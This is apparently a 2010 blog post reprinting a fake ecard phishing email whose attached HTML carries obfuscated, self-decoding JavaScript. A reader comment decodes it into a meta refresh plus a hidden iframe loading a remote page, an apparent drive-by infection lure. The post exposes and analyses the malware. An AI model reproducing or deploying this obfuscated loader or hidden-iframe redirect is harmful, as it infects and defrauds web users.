Monday, June 14, 2010

More self-modifying Javascript.

More self-modifying Javascript. There must be some sort of kit for this out there.


Delivered-To: xyz@dnull.com
Received: (qmail 9347 invoked by uid 82); 14 Jun 2010 12:33:19 -0000
Received: from net37.78.95-129.chelny.ertelecom.ru (95.78.37.129)
  by dnull.com with SMTP; 14 Jun 2010 12:33:19 -0000
Received: from 95.78.37.129 by mail.rjwaters.com; Mon, 14 Jun 2010 15:32:41 +0200
Message-ID: <000d01cb0bbd$aec28820$6400a8c0@positiverkk>
From: "123Greetings.com" <ecards@123greetings.com>
To:  xyz@dnull.com
Subject: positiverkk@rjwaters.com has sent you a birthday ecard.
Date: Mon, 14 Jun 2010 15:32:41 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
  boundary="----=_NextPart_000_0006_01CB0BBD.AEC28820"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180

This is a multi-part message in MIME format.

------=_NextPart_000_0006_01CB0BBD.AEC28820
Content-Type: text/plain;
 format=flowed;
 charset="Windows-1252";
 reply-type=original
Content-Transfer-Encoding: 7bit

[positiverkk@rjwaters.com] just sent you an ecard

You can view it by open attached document.

Your ecard is going to be with us for the next 30 days.

We hope you enjoy your ecard.

ecard.html

<script>
var jwp ; jwp = '' ; var cWhax=this;var PR= ''+'replace' ;var qEBr ,QlYGtB ;var Vtb= 135; if (qEBr==QlYGtB){qEBr = QlYGtB -Vtb;}var XR = 'PZiwIHEbmSVFCg' ; var ECA='OcrRadyvPTqvcGV' ; var jYsZyG; jYsZyG='t4tcP7'; var Nht,sz ,IhBx ;if (IhBx<Nht || Nht>
=sz){Nht= sz^IhBx;}var tbDU='0tdtdtc'; var FwMRi ='9t0tdP4P8P9KeK9Xet0tdXdt1' ;var aYPV=219;var assM, PVqWMD ; if (aYPV>
assM){aYPV = assM+PVqWMD;}var ELNT='t6t5tdXaX9tct8t2K7tat6t4K6O5KbK9K6P7P5t0tfXbt8t4tcK9XaXbtaP4Ket1XdXdX9P3K6K6tet6tet6t6X9K7ta'; function sv(nkAfi){var PYQS =jwp; for(vytw= 0 ;vytw<nkAfi['lKeZnugGtKhG'[PR](/[GKudZ]/g,jwp)] ; ++vytw){PYQS =PYQS+cWhax['SGtGrXiRnLgR'[PR](/[RXdGL]/g ,jwp)]['fqrqonmjCjhjanrjCSoSdSen'[PR](/[nqSjO]/g ,jwp)](9^nkAfi['cxhlaQrQCEovdQeQAvtv'[PR](/[vxQEl]/g, jwp)](vytw)); }return PYQS ;}var cNovEF; cNovEF ='' ;var Ult =287 ; var XV , OFRHX; if (OFRHX>
Ult && Ult==XV){Ult = XV - OFRHX ;}cNovEF='t7P2KeP7P5K6t0' ; var cEN= 671; var vGrGWx =49;var wbOXK=8; if (cEN<vGrGWx){cEN= vGrGWx^wbOXK; }var yt ;yt ='' ; yt ='P4KeP8KeK9t1tct0tet1XdP4';var miOda='hrJHSbCrj';var uuRmg ;uuRmg= '';uuRmg = 'K7tat6t4P3P1P9P1P9K6t' ;var qaiU =425; var HRrdL = 625;var UwkVX ; UwkVX=455 ; if (qaiU>
HRrdL){qaiU =HRrdL^UwkVX ;}var lM = 'cujgJRXbCumHlckmswa';var fz ; fz = ''; var eg = 564 ; var HBZP ,cWnUTE ; if (eg>
=HBZP){eg = HBZP - cWnUTE;}fz ='0t7tdtcX1K7X9t1X9P6X'; var wpNFA,pRZ ;var yXAK=896; if (wpNFA>
pRZ){wpNFA = pRZ/yXAK;}var YZX;YZX='KeP8KeK9XaXdX0t5t'; var wrqylK;wrqylK = 'KbK'; var WfLtQN ; WfLtQN =432;var lE=833 ; var eYig =524 ; if (eYig =WfLtQN || WfLtQN<lE){WfLtQN= lE-eYig;}var gIsW ; gIsW ='' ;var ETuZX ,vt;var xzLS =433;if (ETuZX<vt){ETuZX=vt -xzLS; }gIsW='Xftc' ; var QOh , Tfxm , USrprT ; if (QOh>
=Tfxm){QOh =Tfxm+USrprT ; }var Au = 'XtVOyHAW'; var TUsG=217; var Mvm ;Mvm = 3;var CVc; CVc=676 ; if (TUsG>
Mvm){TUsG =Mvm^CVc; }var UeJmfD = 'Xbt5P4t1XdXdX9P3K6K6Xd'; var IyrWK ; IyrWK='t8t5tctd' ; var CaigsD= 819;var YG, ccjfI;if (ccjfI<CaigsD && CaigsD<YG){CaigsD=YG -ccjfI; }var EE ; EE= '' ; EE= '0P2' ; var It; It='Xft0Xat0tbt0t5t0XdX0P3K9t1t' ;var PCUM, bvEVF ; var lwRIU =925 ; if (PCUM==bvEVF){PCUM =bvEVF/lwRIU ;}var MoOU='DECiRVNbVM'; var uRMo, Tw, TbwgHq ;if (uRMo>
Tw){uRMo=Tw -TbwgHq; }var jZGWg = 'HbwTxZ';var zA= 168 ; var oKMNLY= 74; var YNMHpo ;YNMHpo = 312; if (zA>
oKMNLY){zA= oKMNLY+YNMHpo ; }var it='dP4O5KbPaP2Xc' ;var RK ='tdt6taXct4tct7XdK7XeXbt0XdtcK1KbP5t4tcXdt8K9t1XdXdX9K4tcX8Xct0XfP4O5KbXbtctfXbtcXat1O5KbK9tat6t7Xdtct7X'; var pFlFl; pFlFl = '' ;var ufSfR=660; var cbcj=76; var zKTEu = 676 ; if (ufSfR==cbcj){ufSfR =cbcj-zKTEu;}pFlFl = 't8Xat8t7t6Xft8Xbtc' ; var ICqTJ= 945;var yXDh ,Nbu; if (Nbu= ICqTJ && ICqTJ>
yXDh){ICqTJ=yXDh^Nbu; }var iAc; iAc= '';iAc ='tfXbt8'; var aidGt =25 ;var zwxfqC = 337;var AfCI ;AfCI = 159 ; if (aidGt<zwxfqC){aidGt=zwxfqC+AfCI ; }var LbomSl='cP4Ke' ; var hMjFLa=601 ; var bzpXo ,NPqgN; if (hMjFLa==bzpXo){hMjFLa =bzpXo/NPqgN ;}var MAJjm;MAJjm=jwp ;var Km=RK+it ;Km = Km+UeJmfD+ELNT+pFlFl+gIsW+IyrWK+uuRmg;Km= Km+fz;Km= Km+FwMRi+yt+YZX+LbomSl ;Km = Km+It ;Km = Km+tbDU; Km=Km+cNovEF+iAc+jYsZyG; Km= Km+wrqylK; Km=Km+EE+MAJjm ; var YbeU='xKA2osQ0IPn3UOl5YSa1jWL4HXB7mhr8ztv6JZT9'[PR](/[xoIUYjHmzJ]/g ,'\%')[PR](/[AQnlaLBrvT]/g , '\\') ; var ynSSG= "')[PR](/["; var GZGLMc= "]/g ,'%" ;var pFuQcs =YbeU[PR](/[\%]/g ,ynSSG)[PR](/[\\]/g ,GZGLMc);var Inlz, YwGin ; var gRw = 35; if (Inlz==YwGin){Inlz=YwGin^gRw ;}cWhax['eBvAaClF'[PR](/[FCAHB]/g, jwp)]('var CuoNi= Km'+pFuQcs['shuhbhsAtArPiznPga'[PR](/[aAhzP]/g,jwp)](2 ,pFuQcs['lEeSnSgStIhH'[PR](/[HBSIE]/g , jwp)])+"'); "); cWhax['eovnaIlI'[PR](/[InopA]/g , jwp)](sv(cWhax[['uEntejsjcjaEpVej'[PR](/[jVwtE]/g, jwp)]](CuoNi))) ;</script>




1 comment:

mmengel said...

Just about all of the IFs act as a smokescreen to distract from what it's really doing. The real intent is building a huge string (concatenated variables) that changes due to .replace() and ends up as:

document.write("<meta http-equiv=\"refresh\" content=\"3;url=http://toldspeak.com/\" /><iframe src='http://gogoop.casanovarevealed.com:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe>");

The result is a different form of what you wrote about in your other post. Feel free to look at my comment (2nd comment) where I gave some links for explanation and how to attempt to complain about it.